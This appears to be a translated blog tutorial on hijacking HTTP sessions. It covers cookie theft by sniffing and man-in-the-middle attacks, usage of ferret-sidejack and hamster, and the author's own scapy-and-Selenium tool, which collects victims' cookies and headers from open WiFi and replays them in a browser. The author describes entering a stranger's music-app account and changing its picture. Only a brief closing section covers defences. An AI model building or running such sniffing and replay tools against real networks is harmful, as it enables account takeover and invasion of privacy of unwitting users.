How to efficiently use the HTTP session you've hijacked?


HTTP Session Hijacking

HTTP is a stateless protocol. To maintain and track user state, cookies and sessions were introduced, but both rely on the client sending a cookie to identify the user; with that cookie you obtain the victim's logged-in state, which amounts to hijacking the session.
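
To make this concrete, here is a tiny illustration (the URL and cookie name are placeholders I made up): any client that replays the victim's Cookie header is treated by the server as that logged-in user.

# Replaying a stolen cookie: the server cannot tell this client from the victim.
import requests

resp = requests.get('http://example.com/profile',
                    headers={'Cookie': 'sessionid=STOLEN_VALUE'})  # placeholder cookie
print(resp.status_code)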

How to get the cookie

XSS

There are many XSS techniques for grabbing an administrator's or user's cookie.

Man-in-the-middle

A man-in-the-middle, for example a phishing WiFi hotspot or ARP spoofing, can see all of the user's plaintext traffic.

Wireless network sniffing

WiFi traffic can be sniffed whether the network is open or uses WPA-PSK/WPA2-PSK encryption with a known password; the plaintext communication can be read directly or after decryption, and cookies can be obtained from it.

How to use a hijacked HTTP session manually

Hijacked cookies and headers can be injected and modified with the many Chrome and Firefox plugins, such as Chrome's EditThisCookie plus Modify Headers, or Firefox's Greasemonkey script Original Cookie Injector.

When adding a cookie with EditThisCookie, pay attention to the domain and expiration time you set for the cookie.

This is Modify Headers, used for editing HTTP headers:

Manual operation is convenient when there is only a little data, but when there is a lot of content to go through, you need some automation tools.

Below is the wireless sniffing call using Python's scapy library; see my previous article on wireless sniffing for details:

from scapy.all import sniff, TCP  # prn is a packet-handling callback like the one shown in the server section below
a = sniff(iface='wlan0mon', prn=prn, lfilter=lambda x: x.haslayer(TCP) and x[TCP].flags & 8 == 8)

Two tools: Hamster + Ferret

Ferret is a tool that extracts HTTP session information from packets, and hamster acts as a proxy server that serves the session information extracted by ferret for easy browsing.

Not much to say: set the HTTP proxy to local port 1234, then visit local port 1234; the effect looks roughly like this:

On the right, select a target, which is a source IP address; click a URL on the left and the iframe on the right will load that URL's content:

Installing Ferret

Hamster is already installed in Kali, but ferret needs to be installed manually.

Note that the ferret installed by a plain apt-get is not the same thing; the one you want is ferret-sidejack:

dpkg --add-architecture i386
apt-get update
sudo aptitude install ferret-sidejack:i386

Ferret only ships as a 32-bit binary, so you need to add 32-bit architecture support first.

Using session information from a packet capture

ferret -r test.pcap
hamster

If test.pcap contains session information, a hamster.txt file appears. Then run hamster in the same folder, set the HTTP proxy to local port 1234, and visit 127.0.0.1:1234 to see the result shown above.
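
If you capture the traffic with scapy yourself, a rough way to produce such a pcap for ferret is the sketch below (it assumes wlan0mon is already in monitor mode on an open network, as in the sniffing article; the packet count is arbitrary).

# Sketch: capture TCP traffic with scapy and save it for ferret to parse.
from scapy.all import sniff, wrpcap, TCP

pkts = sniff(iface='wlan0mon', count=1000,
             lfilter=lambda x: x.haslayer(TCP))
wrpcap('test.pcap', pkts)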

Using session information from live sniffing

The method above only works on a saved packet capture; hamster can also invoke ferret to hijack session information sniffed live on a network interface.

First cd to /usr/bin so that the current directory contains the ferret executable, then run hamster, set up the proxy as above and visit local port 1234. Click adapters in the upper right corner, fill in the interface to sniff on (for example wlan0mon), and then submit the query.

Ferret automatically puts the wireless card on channel 6. You can open a terminal and run iwconfig wlan0mon channel 11 to move the card to the target channel. Keep refreshing the page and you will see the list of targets changing and the number of URLs for each target growing.

At this point, the hamster terminal shows this:

Inconvenient points

There are some inconvenient points when using these two tools:

1. Looking at hamster.txt, we find that POST data is not stored at all, which loses a lot of information;

2. If certain key headers need to be sent along, they are not preserved in hamster.txt either, again losing information;

3. If, say, the NetEase Cloud Music app accesses its backend API with a cookie, I would like to use that cookie not only against the API but also against the main site, and with hamster I cannot simply change the URL the way I would by hand;

4. Some headers may need to change after the first request, for example the Referer; or the User-Agent is a phone's and I want to view the page on a computer, so the UA has to be changed.

So I decided to try writing a handier tool for myself.

A small tool Houliangping wrote himself

I needed to implement the functionality hamster + ferret already provide, and then satisfy the four requirements described above.

At first I planned to write a proxy tool like hamster, but found there was too much state to keep, and doing it transparently, without the local browser knowing, is much harder than simple forwarding.

After hitting a wall I decided to use Selenium, a web automation testing tool that I also sometimes use to crawl things that are hard to scrape otherwise.

Selenium can drive a real browser; Chrome, Firefox and others all provide the corresponding driver, which makes it easy to solve point 3 above: changing the URL while carrying along a cookie and other headers.

So there are two difficulties in implementing the program:

1. Persistently modify the HTTP headers of the Selenium webdriver, with support for changing them at any time;

2. Get the webdriver to execute POST requests.

Installing Selenium

First install the Firefox browser, then download the matching geckodriver for your system from GitHub, put geckodriver into a directory on your PATH, and then pip install selenium.

Brief usage

from selenium import webdriver

profile = webdriver.FirefoxProfile()
w = webdriver.Firefox(firefox_profile=profile)

profile is a Firefox browser configuration instance. After this runs, a Firefox window appears, and you can drive the browser by manipulating the variable w,

for example w.get("http://baidu.com").

So using selenium also takes care of the third inconvenience above: I can visit any URL I specify; changing it in the address bar and hitting Enter is enough.

How to modify the webdriver's headers

Selenium provides no direct support for modifying headers. After reading around I found that ChromeOptions can only change the User-Agent. After several attempts, the solution came from a link posted in an answer with zero votes, which provides this code:

fp = webdriver.FirefoxProfile()
path_modify_header = 'C:/xxxxxxx/modify_headers-0.7.1.1-fx.xpi'
fp.add_extension(path_modify_header)
fp.set_preference("modifyheaders.headers.count", 1)
fp.set_preference("modifyheaders.headers.action0", "Add")
fp.set_preference("modifyheaders.headers.name0", "NAME_OF_HEADER")   # set the name of the header here
fp.set_preference("modifyheaders.headers.value0", "VALUE_OF_HEADER") # set the value of the header here
fp.set_preference("modifyheaders.headers.enabled0", True)
fp.set_preference("modifyheaders.config.active", True)
fp.set_preference("modifyheaders.config.alwaysOn", True)
driver = webdriver.Firefox(firefox_profile=fp)

modify_headers-0.7.1.1-fx.xpi is a Firefox plugin that supports adding, changing and deleting headers, and the change is persistent: if I set the Host header to baidu.com, then even if the next site I visit is sina.com, Host stays baidu.com, although that will produce an error.

Moreover, and most importantly, the headers can be modified through the profile's preferences.

Here is the plugin's download link:

Using this plugin also resolves inconveniences 2 and 4 above: all headers can be added and modified automatically, and they can still be modified by hand at any time.
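
Since everything goes through profile preferences, it is easy to wrap in a helper. The function below is a sketch of my own (not code from the original tool); it assumes the Modify Headers .xpi sits next to the script and reuses the same preference names as the snippet above.

# Hypothetical helper: build a FirefoxProfile that loads Modify Headers and
# pre-adds every header in the given dict.
from selenium import webdriver

def make_profile_with_headers(headers, xpi_path='modify_headers-0.7.1.1-fx.xpi'):
    fp = webdriver.FirefoxProfile()
    fp.add_extension(xpi_path)
    fp.set_preference("modifyheaders.headers.count", len(headers))
    for i, (name, value) in enumerate(headers.items()):
        fp.set_preference("modifyheaders.headers.action%d" % i, "Add")
        fp.set_preference("modifyheaders.headers.name%d" % i, name)
        fp.set_preference("modifyheaders.headers.value%d" % i, value)
        fp.set_preference("modifyheaders.headers.enabled%d" % i, True)
    fp.set_preference("modifyheaders.config.active", True)
    fp.set_preference("modifyheaders.config.alwaysOn", True)
    return fp

# Usage: open a browser that sends a hijacked Cookie on every request.
# wd = webdriver.Firefox(firefox_profile=make_profile_with_headers({'Cookie': '...'}))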

How to get the webdriver to execute a POST

Sniffed HTTP requests are of course not only GETs; POSTs matter just as much. Searching for how to POST with Selenium gives a short answer: you can't. But the answers also suggest another route: GET a page whose JavaScript you control, then run a JS script to perform the POST.

But I am not familiar with JS, so I chose a compromise: use requests to fetch the POST response, and then write it into the webdriver with execute_script.
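
Here is a sketch of that compromise (my own illustration, not the original code): it uses BeautifulSoup to split the response into head and body, and passes the content to execute_script as an argument rather than through the raw format string shown further down, which avoids quoting problems.

# Sketch: fetch the POST response with requests, then inject it into the page
# the webdriver is showing.
import requests
from bs4 import BeautifulSoup

def post_into_webdriver(wd, url, headers=None, data=None):
    resp = requests.post(url, headers=headers, data=data)
    soup = BeautifulSoup(resp.text, 'html.parser')
    wd.get('about:blank')  # a blank page already has an empty <head> and <body>
    for tag in ('head', 'body'):
        node = soup.find(tag)
        content = node.decode_contents() if node else ''
        wd.execute_script(
            "document.getElementsByTagName(arguments[0])[0].innerHTML = arguments[1];",
            tag, content)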

The HTML for a blank page is this:

So you can extract the head and body content from the POST response and write them into the webdriver. The execute_script code is as follows: {0} is filled with head or body, and {1} with the corresponding content.

"document.getElementsByTagName('{0}')[0].innerHTML = '{1}'"
A simple architecture for the program

The program needs to do the sniffing conveniently and also drive Selenium, and opening a browser inside the virtual machine was a bit laggy (the machine is poorly specced), so I decided to write a server side and a client side.

The server side serves the hijacked data; the client side is responsible for driving Selenium to browse the sessions. This gives a degree of decoupling: as long as the server/client interface stays the same, the server can hijack sessions through different channels.

For example, the code for wireless sniffing and for a man-in-the-middle attack is certainly different, but there is no need to rewrite the client part.

Server Side

This part uses the wireless sniffing approach to hijack sessions, that is, using a wireless card to receive plaintext HTTP content on open WiFi.

Both of my previous articles covered sniffing with scapy in Python, so the main thing to explain here is prn, the callback function of scapy's sniff:

from collections import defaultdict
from scapy.all import IP
from scapy.layers import http  # provided by the scapy-http package

ip_dict = defaultdict(dict)

def prn(pkt):
    global ip_dict
    if not pkt.haslayer(http.HTTPRequest):
        return None
    print(pkt.summary())
    url = 'http://' + pkt.Host + pkt.Path
    headers = {i.split(':')[0]: i.split(':')[1] for i in pkt.Headers.split('\r\n')}
    data = pkt.load if pkt.Method == 'POST' else 'None'
    ip_dict[pkt[IP].src][url] = (pkt.Method, headers, data)

Like hamster, the hijacked information is categorized by source IP. ip_dict is the dictionary holding the session information, something like {'192.168.1.100': {'http://baidu.com': ('GET', {'Cookie': '123'}, 'None')}}.

Interface between client and server

Requesting the server's root path (just the server's IP address) returns all IP addresses that have hijacked sessions;

Requesting a URL such as 192.168.xxx.xxx/10.170.20.20 returns all the hijacked URLs belonging to 10.170.20.20;

Requesting a URL such as 192.168.xxx.xxx/10.170.20.20/aHR0cDovL2JhaWR1LmNvbQ== returns the hijacked session information for the Baidu URL from 10.170.20.20; the third part is the Base64 encoding of http://baidu.com.
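
For illustration, this interface could be served roughly like the Flask sketch below (written for this article; the actual proxy_server.py on GitHub may be implemented differently).

# Sketch of the server-side interface: /, /<ip>, /<ip>/<base64-url>.
import base64
import json
from flask import Flask

app = Flask(__name__)
ip_dict = {}  # filled by the scapy prn callback shown earlier

@app.route('/')
def list_ips():
    return json.dumps(list(ip_dict.keys()))

@app.route('/<ip>')
def list_urls(ip):
    return json.dumps(list(ip_dict.get(ip, {}).keys()))

@app.route('/<ip>/<path:b64url>')  # path converter, since Base64 can contain '/'
def session_info(ip, b64url):
    url = base64.b64decode(b64url).decode()
    method, headers, data = ip_dict[ip][url]
    return json.dumps({'method': method, 'headers': headers, 'data': data})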

Client Side

First open a browser wd1 to visit the IPs and URLs served by the server. Clicking one of an IP's URLs loads that session's headers, data and other information into a profile and opens a second browser wd2, in which you can then browse someone else's logged-in session in detail.
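
Roughly, the client side ties the earlier sketches together like this (again my own illustration, not the real proxy_client.py; it reuses the make_profile_with_headers and post_into_webdriver helpers sketched above).

# Sketch of the client flow: pull one hijacked session from the server and open
# a second browser (wd2) with its headers applied.
import base64
import json
import requests
from selenium import webdriver

def open_session(server, ip, url):
    b64 = base64.b64encode(url.encode()).decode()
    info = json.loads(requests.get('http://%s/%s/%s' % (server, ip, b64)).text)
    fp = make_profile_with_headers(info['headers'])       # sketched earlier
    wd2 = webdriver.Firefox(firefox_profile=fp)
    if info['method'] == 'POST':
        post_into_webdriver(wd2, url, info['headers'], info['data'])  # sketched earlier
    else:
        wd2.get(url)
    return wd2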

Effect

Few people in the dorm use the open campus WiFi, so during the test it was only me.

This is what it looks like when you first go in:

This is a previously sniffed background request from someone else's NetEase Cloud Music app, carrying a cookie:

With the URL changed to the main site, it went straight in. Note that the User-Agent was removed with the plugin in the upper right corner, otherwise you get the mobile view:

Changed the picture (hehe).

Code

The GitHub address is attached. There are only two files, the client and the server .py files, and no special parameters:

python proxy_server.py 6000

python proxy_client.py 192.168.xxx.xxx 6000

Measures to improve cookie security

HttpOnly property

Setting the HttpOnly attribute on a cookie can, to some extent, prevent session hijacking via XSS. But man-in-the-middle attacks and sniffing capture the plaintext HTTP traffic, so the attribute does nothing against those two; besides, XSS also has ways to bypass HttpOnly.

HTTPS

HTTPS encrypts the HTTP headers and data, but a man-in-the-middle can downgrade the connection with sslstrip, or use the front-end hijacking described in this article, and see the plaintext anyway.

Secure property

The Secure attribute on a cookie makes the browser send it only over HTTPS, which also largely prevents wireless sniffing and man-in-the-middle attacks from hijacking it out of HTTP traffic.
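
On the server side, setting these attributes is usually a one-line change; for example (a Flask illustration, not from the original post):

# Illustration: issue a session cookie with both HttpOnly and Secure set.
from flask import Flask, make_response

app = Flask(__name__)

@app.route('/login')
def login():
    resp = make_response('ok')
    # HttpOnly keeps scripts (XSS) away from the cookie; Secure keeps it off
    # plaintext HTTP, which the sniffing above depends on.
    resp.set_cookie('sessionid', 'abc123', httponly=True, secure=True)
    return resp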

